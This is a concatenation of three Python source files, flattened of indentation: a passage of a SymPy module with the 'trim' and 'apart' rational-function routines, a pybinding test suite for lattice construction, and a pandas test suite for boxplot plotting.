to temporary symbols, rewriting this expression to rational
function form and perform cancellation of common factors.
When given a rational function or a list of symbols discards
all functional components, then this procedure is equivalent
to cancel().
Note that this procedure can thread over composite objects
like big operators, matrices, relational operators etc. It
can be also called recursively (to change this behavior
unset 'recursive' flag).
>>> from sympy import Function, trim, sin
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> trim((f(x)**2+f(x))/f(x))
1 + f(x)
>>> trim((x**2+x)/x)
1 + x
Recursively simplify expressions:
>>> trim(sin((f(x)**2+f(x))/f(x)))
sin(1 + f(x))
"""
f = sympify(f)
if isinstance(f, Relational):
return Relational(trim(f.lhs, *symbols, **flags),
trim(f.rhs, *symbols, **flags), f.rel_op)
#elif isinstance(f, Matrix):
# return f.applyfunc(lambda g: trim(g, *symbols, **flags))
else:
recursive = flags.get('recursive', True)
def is_functional(g):
return not (g.is_Atom or g.is_number) \
and (not symbols or g.has(*symbols))
def components(g):
result = set()
if is_functional(g):
if g.is_Add or g.is_Mul:
args = []
for h in g.args:
h, terms = components(h)
result |= terms
args.append(h)
g = g.func(*args)
elif g.is_Pow:
if recursive:
base = trim(g.base, *symbols, **flags)
else:
base = g.base
if g.exp.is_Rational:
if g.exp.is_Integer:
if g.exp is S.NegativeOne:
h, terms = components(base)
return h**S.NegativeOne, terms
else:
h = base
else:
h = base**Rational(1, g.exp.q)
g = base**g.exp
else:
if recursive:
h = g = base**trim(g.exp, *symbols, **flags)
else:
h = g = base**g.exp
if is_functional(h):
result.add(h)
else:
if not recursive:
result.add(g)
else:
g = g.func(*[trim(h, *symbols, **flags)
for h in g.args])
if is_functional(g):
result.add(g)
return g, result
if not isinstance(f, Basic) \
or f.is_number \
or not f.has_any_symbols(*symbols):
return f
f = together(f.expand())
f, terms = components(f)
if not terms:
return Poly.cancel(f, *symbols)
else:
mapping, reverse = {}, {}
for g in terms:
mapping[g] = Temporary()
reverse[mapping[g]] = g
p, q = f.as_numer_denom()
f = p.expand()/q.expand()
if not symbols:
symbols = tuple(f.atoms(Symbol))
symbols = tuple(mapping.values()) + symbols
H = Poly.cancel(f.subs(mapping), *symbols)
if not flags.get('extract', True):
return H.subs(reverse)
else:
def extract(f):
p = f.args[0]
for q in f.args[1:]:
p = gcd(p, q, *symbols)
if p.is_number:
return S.One, f
return p, Add(*[quo(g, p, *symbols) for g in f.args])
P, Q = H.as_numer_denom()
if P.is_Add:
GP, P = extract(P)
else:
GP = S.One
if Q.is_Add:
GQ, Q = extract(Q)
else:
GQ = S.One
return ((GP*P)/(GQ*Q)).subs(reverse)
@threaded()
def apart(f, z, **flags):
"""Compute partial fraction decomposition of a rational function.
Given a rational function 'f', performing only gcd operations
over the algebraic closure of the initial field of definition,
compute full partial fraction decomposition with fractions
having linear denominators.
For all other kinds of expressions the input is returned in an
unchanged form. Note however, that 'apart' function can thread
over sums and relational operators.
Note that no factorization of the initial denominator of 'f' is
needed. The final decomposition is formed in terms of a sum of
RootSum instances. By default RootSum tries to compute all its
roots to simplify itself. This behavior can be however avoided
by setting the keyword flag evaluate=False, which will make this
function return a formal decomposition.
>>> from sympy import apart
>>> from sympy.abc import x, y
>>> apart(y/(x+2)/(x+1), x)
y/(1 + x) - y/(2 + x)
>>> apart(1/(1+x**5), x, evaluate=False)
RootSum(Lambda(_a, -_a/(5*(x - _a))), x**5 + 1, x)
For more information on the implemented algorithm refer to:
[1] M. Bronstein, B. Salvy, Full partial fraction decomposition
of rational functions, in: M. Bronstein, ed., Proceedings
ISSAC '93, ACM Press, Kiev, Ukraine, 1993, pp. 157-160.
"""
if not f.has(z):
return f
f = Poly.cancel(f, z)
P, Q = f.as_numer_denom()
if not Q.has(z):
return f
partial, r = div(P, Q, z)
f, q, U = r / Q, Q, []
u = Function('u')(z)
a = Symbol('a', dummy=True)
for k, d in enumerate(poly_sqf(q, z)):
n, b = k + 1, d.as_basic()
U += [ u.diff(z, k) ]
h = together(Poly.cancel(f*b**n, z) / u**n)
H, subs = [h], []
for j in range(1, n):
H += [ H[-1].diff(z) / j ]
for j in range(1, n+1):
subs += [ (U[j-1], b.diff(z, j) / j) ]
for j in range(0, n):
P, Q = together(H[j]).as_numer_denom()
for i in range(0, j+1):
P = P.subs(*subs[j-i])
Q = Q.subs(*subs[0])
P, Q = Poly(P, z), Poly(Q, z)
G = poly_gcd(P, d)
D = poly_quo(d, G)
B, g = poly_half_gcdex(Q, D)
b = poly_rem(P * poly_quo(B, g), D)
numer = b.as_basic()
denom = (z-a)**(n-j)
expr = numer.subs(z, a) / denom
partial += RootSum(Lambda(a, expr), D, **flags)
return partial
|
|
import pytest
import numpy as np
import pybinding as pb
from pybinding.repository import graphene
from pybinding.support.deprecated import LoudDeprecationWarning
lattices = {
"graphene-monolayer": graphene.monolayer(),
"graphene-monolayer-nn": graphene.monolayer(2),
"graphene-monolayer-4atom": graphene.monolayer_4atom(),
"graphene-bilayer": graphene.bilayer(),
}
@pytest.fixture(scope='module', ids=list(lattices.keys()), params=lattices.values())
def lattice(request):
return request.param
def test_pickle_round_trip(lattice):
import pickle
unpickled = pickle.loads(pickle.dumps(lattice))
assert pytest.fuzzy_equal(lattice, unpickled)
def test_expected(lattice, baseline, plot_if_fails):
expected = baseline(lattice)
plot_if_fails(lattice, expected, "plot")
assert pytest.fuzzy_equal(lattice, expected)
def test_init():
lat1d = pb.Lattice(1)
assert lat1d.ndim == 1
assert len(lat1d.vectors) == 1
assert pytest.fuzzy_equal(lat1d.vectors[0], [1, 0, 0])
lat2d = pb.Lattice([1, 0], [0, 1])
assert lat2d.ndim == 2
assert len(lat2d.vectors) == 2
assert pytest.fuzzy_equal(lat2d.vectors[0], [1, 0, 0])
assert pytest.fuzzy_equal(lat2d.vectors[1], [0, 1, 0])
lat3d = pb.Lattice([1, 0, 0], [0, 1, 0], [0, 0, 1])
assert lat3d.ndim == 3
assert len(lat3d.vectors) == 3
assert pytest.fuzzy_equal(lat3d.vectors[0], [1, 0, 0])
assert pytest.fuzzy_equal(lat3d.vectors[1], [0, 1, 0])
assert pytest.fuzzy_equal(lat3d.vectors[2], [0, 0, 1])
def test_add_sublattice(capsys):
lat = pb.Lattice(1)
assert lat.nsub == 0
lat.add_one_sublattice("A", 0.0)
assert lat.nsub == 1
lat.add_sublattices(("B", 0.1),
("C", 0.2))
assert lat.nsub == 3
subs = lat.sublattices
assert len(subs) == 3
assert all(v in subs for v in ("A", "B", "C"))
assert pytest.fuzzy_equal(subs["A"].position, [0, 0, 0])
assert subs["A"].energy == 0
assert subs["A"].unique_id == 0
assert subs["A"].alias_id == 0
assert pytest.fuzzy_equal(subs["B"].position, [0.1, 0, 0])
assert subs["B"].energy == 0
assert subs["B"].unique_id == 1
assert subs["B"].alias_id == 1
assert pytest.fuzzy_equal(subs["C"].position, [0.2, 0, 0])
assert subs["C"].energy == 0
assert subs["C"].unique_id == 2
assert subs["C"].alias_id == 2
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("", 0)
assert "Sublattice name can't be blank" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("A", 0)
assert "Sublattice 'A' already exists" in str(excinfo.value)
with pytest.warns(LoudDeprecationWarning):
assert lat["A"] == "A"
capsys.readouterr()
def test_add_multiorbital_sublattice():
lat = pb.Lattice([1, 0], [0, 1])
lat.add_one_sublattice("A", [0, 0])
assert lat.nsub == 1
lat.add_one_sublattice("B", [0, 0], [1, 2, 3])
assert pytest.fuzzy_equal(lat.sublattices["B"].energy, [[1, 0, 0],
[0, 2, 0],
[0, 0, 3]])
lat.add_one_sublattice("C", [0, 0], [[1, 2, 3],
[0, 4, 5],
[0, 0, 6]])
assert pytest.fuzzy_equal(lat.sublattices["C"].energy, [[1, 2, 3],
[2, 4, 5],
[3, 5, 6]])
lat.add_one_sublattice("D", [0, 0], [[1, 2j, 3],
[0, 4, 5j],
[0, 0, 6]])
assert pytest.fuzzy_equal(lat.sublattices["D"].energy, [[ 1, 2j, 3],
[-2j, 4, 5j],
[ 3, -5j, 6]])
lat.add_one_sublattice("E", [0, 0], [[1, 2, 3],
[2, 4, 5],
[3, 5, 6]])
assert pytest.fuzzy_equal(lat.sublattices["E"].energy, [[1, 2, 3],
[2, 4, 5],
[3, 5, 6]])
assert lat.nsub == 5
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("zero-dimensional", [0, 0], [])
assert "can't be zero-dimensional" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("complex onsite energy", [0, 0], [1j, 2j, 3j])
assert "must be a real vector or a square matrix" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("not square", [0, 0], [[1, 2, 3],
[4, 5, 6]])
assert "must be a real vector or a square matrix" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("not square", [0, 0], [[1j, 2, 3],
[ 2, 4j, 5],
[ 3, 5, 6j]])
assert "The main diagonal of the onsite hopping term must be real" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("not Hermitian", [0, 0], [[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
assert "The onsite hopping matrix must be upper triangular or Hermitian" in str(excinfo.value)
def test_add_sublattice_alias(capsys):
lat = pb.Lattice([1, 0], [0, 1])
lat.add_sublattices(("A", [0.0, 0.5]),
("B", [0.5, 0.0]))
c_position = [0, 9]
lat.add_one_alias("C", "A", c_position)
assert lat.sublattices["C"].unique_id != lat.sublattices["A"].unique_id
assert lat.sublattices["C"].alias_id == lat.sublattices["A"].alias_id
model = pb.Model(lat)
c_index = model.system.find_nearest(c_position)
assert model.system.sublattices[c_index] == lat.sublattices["C"].alias_id
assert c_index in np.argwhere(model.system.sublattices == "A")
with pytest.raises(IndexError) as excinfo:
lat.add_one_alias("D", "bad_name", [0, 0])
assert "There is no sublattice named 'bad_name'" in str(excinfo.value)
with pytest.warns(LoudDeprecationWarning):
lat.add_one_sublattice("Z", c_position, alias="A")
capsys.readouterr()
def test_add_hopping(capsys):
lat = pb.Lattice([1, 0], [0, 1])
lat.add_sublattices(("A", [0.0, 0.5]),
("B", [0.5, 0.0]))
lat.add_hoppings(([0, 0], "A", "B", 1),
([1, -1], "A", "B", 1),
([0, -1], "A", "B", 2))
assert lat.nhop == 2
assert lat.hoppings["__anonymous__0"].family_id == 0
assert lat.hoppings["__anonymous__0"].energy == 1
assert lat.hoppings["__anonymous__1"].family_id == 1
assert lat.hoppings["__anonymous__1"].energy == 2
lat.add_hoppings(([0, 1], "A", "B", 1))
assert lat.nhop == 2
lat.add_hoppings(([1, 0], "A", "B", 3))
assert lat.nhop == 3
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], "A", "B", 1)
assert "hopping already exists" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], "A", "A", 1)
assert "Don't define onsite energy here" in str(excinfo.value)
with pytest.raises(IndexError) as excinfo:
lat.add_one_hopping([0, 0], "C", "A", 1)
assert "There is no sublattice named 'C'" in str(excinfo.value)
lat.register_hopping_energies({
"t_nn": 0.1,
"t_nnn": 0.01
})
assert lat.nhop == 5
assert lat.hoppings["t_nn"].energy == 0.1
assert lat.hoppings["t_nnn"].energy == 0.01
lat.add_one_hopping([0, 1], "A", "A", "t_nn")
with pytest.raises(RuntimeError) as excinfo:
lat.register_hopping_energies({"": 0.0})
assert "Hopping name can't be blank" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.register_hopping_energies({"t_nn": 0.2})
assert "Hopping 't_nn' already exists" in str(excinfo.value)
with pytest.raises(IndexError) as excinfo:
lat.add_one_hopping((0, 1), "A", "A", "tt")
assert "There is no hopping named 'tt'" in str(excinfo.value)
with pytest.warns(LoudDeprecationWarning):
assert lat("t_nn") == "t_nn"
capsys.readouterr()
def test_add_matrix_hopping():
lat = pb.Lattice([1, 0], [0, 1])
lat.add_sublattices(("A", [0.0, 0.5]),
("B", [0.5, 0.0]))
lat.add_hoppings(([0, 0], "A", "B", 1),
([1, -1], "A", "B", 1),
([0, -1], "A", "B", 2))
assert lat.nsub == 2
assert lat.nhop == 2
lat.add_sublattices(("A2", [0, 0], [1, 2]),
("B2", [0, 0], [1, 2]),
("C3", [0, 0], [1, 2, 3]))
assert lat.nsub == 5
lat.register_hopping_energies({"t22": [[1, 2],
[3, 4]],
"t23": [[1, 2, 3],
[4, 5, 6]]})
assert lat.nhop == 4
with pytest.raises(RuntimeError) as excinfo:
lat.register_hopping_energies({"zero-dimensional": []})
assert "can't be zero-dimensional" in str(excinfo.value)
lat.add_hoppings(([0, 0], "A2", "B2", "t22"),
([1, 0], "A2", "A2", "t22"),
([0, 0], "A2", "C3", "t23"),
([1, 0], "A2", "C3", "t23"))
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], 'A2', 'A2', "t22")
assert "Don't define onsite energy here" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], 'B2', 'C3', "t22")
assert "mismatch: from 'B2' (2) to 'C3' (3) with matrix 't22' (2, 2)" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], 'C3', 'B2', "t23")
assert "mismatch: from 'C3' (3) to 'B2' (2) with matrix 't23' (2, 3)" in str(excinfo.value)
def test_builder():
"""Builder pattern methods"""
lattice = pb.Lattice([1, 0], [0, 1])
copy = lattice.with_offset([0, 0.5])
assert pytest.fuzzy_equal(copy.offset, [0, 0.5, 0])
assert pytest.fuzzy_equal(lattice.offset, [0, 0, 0])
copy = lattice.with_min_neighbors(5)
assert copy.min_neighbors == 5
assert lattice.min_neighbors == 1
def test_brillouin_zone():
from math import pi, sqrt
lat = pb.Lattice(a1=1)
assert pytest.fuzzy_equal(lat.brillouin_zone(), [-pi, pi])
lat = pb.Lattice(a1=[0, 1], a2=[0.5, 0.5])
assert pytest.fuzzy_equal(lat.brillouin_zone(),
[[0, -2 * pi], [2 * pi, 0], [0, 2 * pi], [-2 * pi, 0]])
# Identical lattices represented using acute and obtuse angles between primitive vectors
acute = pb.Lattice(a1=[1, 0], a2=[1/2, 1/2 * sqrt(3)])
obtuse = pb.Lattice(a1=[1/2, 1/2 * sqrt(3)], a2=[1/2, -1/2 * sqrt(3)])
assert pytest.fuzzy_equal(acute.brillouin_zone(), obtuse.brillouin_zone())
|
|
""" Test cases for .boxplot method """
import itertools
import string
import numpy as np
import pytest
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
date_range,
timedelta_range,
)
import pandas._testing as tm
from pandas.tests.plotting.common import (
TestPlotBase,
_check_plot_works,
)
import pandas.plotting as plotting
pytestmark = pytest.mark.slow
@td.skip_if_no_mpl
class TestDataFramePlots(TestPlotBase):
def test_boxplot_legacy1(self):
df = DataFrame(
np.random.randn(6, 4),
index=list(string.ascii_letters[:6]),
columns=["one", "two", "three", "four"],
)
df["indic"] = ["foo", "bar"] * 3
df["indic2"] = ["foo", "bar", "foo"] * 2
_check_plot_works(df.boxplot, return_type="dict")
_check_plot_works(df.boxplot, column=["one", "two"], return_type="dict")
# _check_plot_works adds an ax so catch warning. see GH #13188
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, column=["one", "two"], by="indic")
_check_plot_works(df.boxplot, column="one", by=["indic", "indic2"])
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, by="indic")
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, by=["indic", "indic2"])
_check_plot_works(plotting._core.boxplot, data=df["one"], return_type="dict")
_check_plot_works(df.boxplot, notch=1, return_type="dict")
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, by="indic", notch=1)
def test_boxplot_legacy2(self):
df = DataFrame(np.random.rand(10, 2), columns=["Col1", "Col2"])
df["X"] = Series(["A", "A", "A", "A", "A", "B", "B", "B", "B", "B"])
df["Y"] = Series(["A"] * 10)
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, by="X")
# When ax is supplied and required number of axes is 1,
# passed ax should be used:
fig, ax = self.plt.subplots()
axes = df.boxplot("Col1", by="X", ax=ax)
ax_axes = ax.axes
assert ax_axes is axes
fig, ax = self.plt.subplots()
axes = df.groupby("Y").boxplot(ax=ax, return_type="axes")
ax_axes = ax.axes
assert ax_axes is axes["A"]
# Multiple columns with an ax argument should use same figure
fig, ax = self.plt.subplots()
with tm.assert_produces_warning(UserWarning):
axes = df.boxplot(
column=["Col1", "Col2"], by="X", ax=ax, return_type="axes"
)
assert axes["Col1"].get_figure() is fig
# When by is None, check that all relevant lines are present in the
# dict
fig, ax = self.plt.subplots()
d = df.boxplot(ax=ax, return_type="dict")
lines = list(itertools.chain.from_iterable(d.values()))
assert len(ax.get_lines()) == len(lines)
def test_boxplot_return_type_none(self):
# GH 12216; return_type=None & by=None -> axes
result = self.hist_df.boxplot()
assert isinstance(result, self.plt.Axes)
def test_boxplot_return_type_legacy(self):
# API change in https://github.com/pandas-dev/pandas/pull/7096
import matplotlib as mpl # noqa
df = DataFrame(
np.random.randn(6, 4),
index=list(string.ascii_letters[:6]),
columns=["one", "two", "three", "four"],
)
msg = "return_type must be {'axes', 'dict', 'both'}"
with pytest.raises(ValueError, match=msg):
df.boxplot(return_type="NOT_A_TYPE")
result = df.boxplot()
self._check_box_return_type(result, "axes")
with tm.assert_produces_warning(False):
result = df.boxplot(return_type="dict")
self._check_box_return_type(result, "dict")
with tm.assert_produces_warning(False):
result = df.boxplot(return_type="axes")
self._check_box_return_type(result, "axes")
with tm.assert_produces_warning(False):
result = df.boxplot(return_type="both")
self._check_box_return_type(result, "both")
def test_boxplot_axis_limits(self):
def _check_ax_limits(col, ax):
y_min, y_max = ax.get_ylim()
assert y_min <= col.min()
assert y_max >= col.max()
df = self.hist_df.copy()
df["age"] = np.random.randint(1, 20, df.shape[0])
# One full row
height_ax, weight_ax = df.boxplot(["height", "weight"], by="category")
_check_ax_limits(df["height"], height_ax)
_check_ax_limits(df["weight"], weight_ax)
assert weight_ax._sharey == height_ax
# Two rows, one partial
p = df.boxplot(["height", "weight", "age"], by="category")
height_ax, weight_ax, age_ax = p[0, 0], p[0, 1], p[1, 0]
dummy_ax = p[1, 1]
_check_ax_limits(df["height"], height_ax)
_check_ax_limits(df["weight"], weight_ax)
_check_ax_limits(df["age"], age_ax)
assert weight_ax._sharey == height_ax
assert age_ax._sharey == height_ax
assert dummy_ax._sharey is None
def test_boxplot_empty_column(self):
df = DataFrame(np.random.randn(20, 4))
df.loc[:, 0] = np.nan
_check_plot_works(df.boxplot, return_type="axes")
def test_figsize(self):
df = DataFrame(np.random.rand(10, 5), columns=["A", "B", "C", "D", "E"])
result = df.boxplot(return_type="axes", figsize=(12, 8))
assert result.figure.bbox_inches.width == 12
assert result.figure.bbox_inches.height == 8
def test_fontsize(self):
df = DataFrame({"a": [1, 2, 3, 4, 5, 6]})
self._check_ticks_props(
df.boxplot("a", fontsize=16), xlabelsize=16, ylabelsize=16
)
def test_boxplot_numeric_data(self):
# GH 22799
df = DataFrame(
{
"a": date_range("2012-01-01", periods=100),
"b": np.random.randn(100),
"c": np.random.randn(100) + 2,
"d": date_range("2012-01-01", periods=100).astype(str),
"e": date_range("2012-01-01", periods=100, tz="UTC"),
"f": timedelta_range("1 days", periods=100),
}
)
ax = df.plot(kind="box")
assert [x.get_text() for x in ax.get_xticklabels()] == ["b", "c"]
@pytest.mark.parametrize(
"colors_kwd, expected",
[
(
{"boxes": "r", "whiskers": "b", "medians": "g", "caps": "c"},
{"boxes": "r", "whiskers": "b", "medians": "g", "caps": "c"},
),
({"boxes": "r"}, {"boxes": "r"}),
("r", {"boxes": "r", "whiskers": "r", "medians": "r", "caps": "r"}),
],
)
def test_color_kwd(self, colors_kwd, expected):
# GH: 26214
df = DataFrame(np.random.rand(10, 2))
result = df.boxplot(color=colors_kwd, return_type="dict")
for k, v in expected.items():
assert result[k][0].get_color() == v
@pytest.mark.parametrize(
"scheme,expected",
[
(
"dark_background",
{
"boxes": "#8dd3c7",
"whiskers": "#8dd3c7",
"medians": "#bfbbd9",
"caps": "#8dd3c7",
},
),
(
"default",
{
"boxes": "#1f77b4",
"whiskers": "#1f77b4",
"medians": "#2ca02c",
"caps": "#1f77b4",
},
),
],
)
def test_colors_in_theme(self, scheme, expected):
# GH: 40769
df = DataFrame(np.random.rand(10, 2))
import matplotlib.pyplot as plt
plt.style.use(scheme)
result = df.plot.box(return_type="dict")
for k, v in expected.items():
assert result[k][0].get_color() == v
@pytest.mark.parametrize(
"dict_colors, msg",
[({"boxes": "r", "invalid_key": "r"}, "invalid key 'invalid_key'")],
)
def test_color_kwd_errors(self, dict_colors, msg):
# GH: 26214
df = DataFrame(np.random.rand(10, 2))
with pytest.raises(ValueError, match=msg):
df.boxplot(color=dict_colors, return_type="dict")
@pytest.mark.parametrize(
"props, expected",
[
("boxprops", "boxes"),
("whiskerprops", "whiskers"),
("capprops", "caps"),
("medianprops", "medians"),
],
)
def test_specified_props_kwd(self, props, expected):
# GH 30346
df = DataFrame({k: np.random.random(100) for k in "ABC"})
kwd = {props: {"color": "C1"}}
result = df.boxplot(return_type="dict", **kwd)
assert result[expected][0].get_color() == "C1"
@td.skip_if_no_mpl
class TestDataFrameGroupByPlots(TestPlotBase):
def test_boxplot_legacy1(self):
grouped = self.hist_df.groupby(by="gender")
with tm.assert_produces_warning(UserWarning):
axes = _check_plot_works(grouped.boxplot, return_type="axes")
self._check_axes_shape(list(axes.values), axes_num=2, layout=(1, 2))
axes = _check_plot_works(grouped.boxplot, subplots=False, return_type="axes")
self._check_axes_shape(axes, axes_num=1, layout=(1, 1))
def test_boxplot_legacy2(self):
tuples = zip(string.ascii_letters[:10], range(10))
df = DataFrame(np.random.rand(10, 3), index=MultiIndex.from_tuples(tuples))
grouped = df.groupby(level=1)
with tm.assert_produces_warning(UserWarning):
axes = _check_plot_works(grouped.boxplot, return_type="axes")
self._check_axes_shape(list(axes.values), axes_num=10, layout=(4, 3))
axes = _check_plot_works(grouped.boxplot, subplots=False, return_type="axes")
self._check_axes_shape(axes, axes_num=1, layout=(1, 1))
def test_boxplot_legacy3(self):
tuples = zip(string.ascii_letters[:10], range(10))
df = DataFrame(np.random.rand(10, 3), index=MultiIndex.from_tuples(tuples))
grouped = df.unstack(level=1).groupby(level=0, axis=1)
with tm.assert_produces_warning(UserWarning):
axes = _check_plot_works(grouped.boxplot, return_type="axes")
self._check_axes_shape(list(axes.values), axes_num=3, layout=(2, 2))
axes = _check_plot_works(grouped.boxplot, subplots=False, return_type="axes")
self._check_axes_shape(axes, axes_num=1, layout=(1, 1))
def test_grouped_plot_fignums(self):
n = 10
weight = Series(np.random.normal(166, 20, size=n))
height = Series(np.random.normal(60, 10, size=n))
with tm.RNGContext(42):
gender = np.random.choice(["male", "female"], size=n)
df = DataFrame({"height": height, "weight": weight, "gender": gender})
gb = df.groupby("gender")
res = gb.plot()
assert len(self.plt.get_fignums()) == 2
assert len(res) == 2
tm.close()
res = gb.boxplot(return_type="axes")
assert len(self.plt.get_fignums()) == 1
assert len(res) == 2
tm.close()
# now works with GH 5610 as gender is excluded
res = df.groupby("gender").hist()
tm.close()
def test_grouped_box_return_type(self):
df = self.hist_df
# old style: return_type=None
result = df.boxplot(by="gender")
assert isinstance(result, np.ndarray)
self._check_box_return_type(
result, None, expected_keys=["height", "weight", "category"]
)
# now for groupby
result = df.groupby("gender").boxplot(return_type="dict")
self._check_box_return_type(result, "dict", expected_keys=["Male", "Female"])
columns2 = "X B C D A G Y N Q O".split()
df2 = DataFrame(np.random.randn(50, 10), columns=columns2)
categories2 = "A B C D E F G H I J".split()
df2["category"] = categories2 * 5
for t in ["dict", "axes", "both"]:
returned = df.groupby("classroom").boxplot(return_type=t)
self._check_box_return_type(returned, t, expected_keys=["A", "B", "C"])
returned = df.boxplot(by="classroom", return_type=t)
self._check_box_return_type(
returned, t, expected_keys=["height", "weight", "category"]
)
returned = df2.groupby("category").boxplot(return_type=t)
self._check_box_return_type(returned, t, expected_keys=categories2)
returned = df2.boxplot(by="category", return_type=t)
self._check_box_return_type(returned, t, expected_keys=columns2)
def test_grouped_box_layout(self):
df = self.hist_df
msg = "Layout of 1x1 must be larger than required size 2"
with pytest.raises(ValueError, match=msg):
df.boxplot(column=["weight", "height"], by=df.gender, layout=(1, 1))
msg = "The 'layout' keyword is not supported when 'by' is None"
with pytest.raises(ValueError, match=msg):
df.boxplot(
column=["height", "weight", "category"],
layout=(2, 1),
return_type="dict",
)
msg = "At least one dimension of layout must be positive"
with pytest.raises(ValueError, match=msg):
df.boxplot(column=["weight", "height"], by=df.gender, layout=(-1, -1))
# _check_plot_works adds an ax so catch warning. see GH #13188
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("gender").boxplot, column="height", return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=2, layout=(1, 2))
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("category").boxplot, column="height", return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=4, layout=(2, 2))
# GH 6769
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("classroom").boxplot, column="height", return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(2, 2))
# GH 5897
axes = df.boxplot(
column=["height", "weight", "category"], by="gender", return_type="axes"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(2, 2))
for ax in [axes["height"]]:
self._check_visible(ax.get_xticklabels(), visible=False)
self._check_visible([ax.xaxis.get_label()], visible=False)
for ax in [axes["weight"], axes["category"]]:
self._check_visible(ax.get_xticklabels())
self._check_visible([ax.xaxis.get_label()])
box = df.groupby("classroom").boxplot(
column=["height", "weight", "category"], return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(2, 2))
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("category").boxplot,
column="height",
layout=(3, 2),
return_type="dict",
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=4, layout=(3, 2))
with tm.assert_produces_warning(UserWarning):
box = _check_plot_works(
df.groupby("category").boxplot,
column="height",
layout=(3, -1),
return_type="dict",
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=4, layout=(3, 2))
box = df.boxplot(
column=["height", "weight", "category"], by="gender", layout=(4, 1)
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(4, 1))
box = df.boxplot(
column=["height", "weight", "category"], by="gender", layout=(-1, 1)
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(3, 1))
box = df.groupby("classroom").boxplot(
column=["height", "weight", "category"], layout=(1, 4), return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(1, 4))
box = df.groupby("classroom").boxplot( # noqa
column=["height", "weight", "category"], layout=(1, -1), return_type="dict"
)
self._check_axes_shape(self.plt.gcf().axes, axes_num=3, layout=(1, 3))
def test_grouped_box_multiple_axes(self):
# GH 6970, GH 7069
df = self.hist_df
# check warning to ignore sharex / sharey
# this check should be done in the first function which
# passes multiple axes to plot, hist or boxplot
# location should be changed if other test is added
# which has earlier alphabetical order
with tm.assert_produces_warning(UserWarning):
fig, axes = self.plt.subplots(2, 2)
df.groupby("category").boxplot(column="height", return_type="axes", ax=axes)
self._check_axes_shape(self.plt.gcf().axes, axes_num=4, layout=(2, 2))
fig, axes = self.plt.subplots(2, 3)
with tm.assert_produces_warning(UserWarning):
returned = df.boxplot(
column=["height", "weight", "category"],
by="gender",
return_type="axes",
ax=axes[0],
)
returned = np.array(list(returned.values))
self._check_axes_shape(returned, axes_num=3, layout=(1, 3))
tm.assert_numpy_array_equal(returned, axes[0])
assert returned[0].figure is fig
# draw on second row
with tm.assert_produces_warning(UserWarning):
returned = df.groupby("classroom").boxplot(
column=["height", "weight", "category"], return_type="axes", ax=axes[1]
)
returned = np.array(list(returned.values))
self._check_axes_shape(returned, axes_num=3, layout=(1, 3))
tm.assert_numpy_array_equal(returned, axes[1])
assert returned[0].figure is fig
msg = "The number of passed axes must be 3, the same as the output plot"
with pytest.raises(ValueError, match=msg):
fig, axes = self.plt.subplots(2, 3)
# pass different number of axes from required
with tm.assert_produces_warning(UserWarning):
axes = df.groupby("classroom").boxplot(ax=axes)
def test_fontsize(self):
df = DataFrame({"a": [1, 2, 3, 4, 5, 6], "b": [0, 0, 0, 1, 1, 1]})
self._check_ticks_props(
df.boxplot("a", by="b", fontsize=16), xlabelsize=16, ylabelsize=16
)
@pytest.mark.parametrize(
"col, expected_xticklabel",
[
("v", ["(a, v)", "(b, v)", "(c, v)", "(d, v)", "(e, v)"]),
(["v"], ["(a, v)", "(b, v)", "(c, v)", "(d, v)", "(e, v)"]),
("v1", ["(a, v1)", "(b, v1)", "(c, v1)", "(d, v1)", "(e, v1)"]),
(
["v", "v1"],
[
"(a, v)",
"(a, v1)",
"(b, v)",
"(b, v1)",
"(c, v)",
"(c, v1)",
"(d, v)",
"(d, v1)",
"(e, v)",
"(e, v1)",
],
),
(
None,
[
"(a, v)",
"(a, v1)",
"(b, v)",
"(b, v1)",
"(c, v)",
"(c, v1)",
"(d, v)",
"(d, v1)",
"(e, v)",
"(e, v1)",
],
),
],
)
def test_groupby_boxplot_subplots_false(self, col, expected_xticklabel):
# GH 16748
df = DataFrame(
{
"cat": np.random.choice(list("abcde"), 100),
"v": np.random.rand(100),
"v1": np.random.rand(100),
}
)
grouped = df.groupby("cat")
axes = _check_plot_works(
grouped.boxplot, subplots=False, column=col, return_type="axes"
)
